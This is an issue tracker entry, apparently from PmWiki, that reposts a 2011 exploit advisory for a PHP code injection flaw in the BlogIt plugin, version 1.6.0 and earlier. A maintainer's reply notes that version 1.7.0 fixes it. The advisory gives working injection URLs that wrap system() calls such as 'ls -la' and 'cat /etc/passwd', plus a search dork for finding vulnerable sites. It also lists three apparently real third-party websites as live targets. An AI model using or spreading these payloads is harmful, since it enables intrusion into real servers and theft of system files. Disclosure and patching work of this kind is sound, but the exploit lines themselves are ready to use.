01258: Vulnerability in BlogIt 1.6.0

Summary: Vulnerability in BlogIt 1.6.0
Created: 2011-07-03 14:50
Status: Closed
Category: Cookbook
Assigned:
Priority: 5
Version: <= 1.6.0
OS: not applicable

Description:

===================================================================
BlogIt <= 1.6.0 Php Code Injection Vulnerability
===================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Ux0r
#[+] E-mail          : ux0r@live.com
#[+] Home            : http://ux0r.blogspot.com ~ http://mavi1.org
#[+] Message         : Benim eski indekslerin üzerine yazmaya çalýþan lamerlere selam olsun. Beni güldürdünüz :)

Product : BlogIt
Version : <= 1.6.0
Site    : http://www.pmwiki.org/wiki/Cookbook/BlogIt
Dork    : "powered by blogIt"


 = Error in file Site.BlogList =

Error code: (Line 11)

text=(:includesection "#blog-yearly-archive-pagelist blogid={(bi_ifnull '{$bi_BlogId}' blog1)} status=publish,sticky":)

A vulnerable parameter $bi_BlogId


 = Exploit =

- http://site.com/path/Site/BlogList?blogid=${@print(...)}  ; ... => php code injection


 = Example =

- http://site.com/Site/BlogList?blogid=${@print(system('ls -la'))}

 = Live examples =

- http://schniertshauer.com/Site/BlogList?blogid=${@print(system('ls -la'))}
- http://dotdelimited.com/Site/BlogList?blogid=${@print(system('pwd'))}
- http://tognela.net/Site/BlogList?blogid=${@print(system('cat /etc/passwd'))}

 < Esenlikler dilerim. 2 bin 11 >

DaveG 4-Jul-2011: This issue was resolved with version BlogIt 1.7.0. Please upgrade immediately.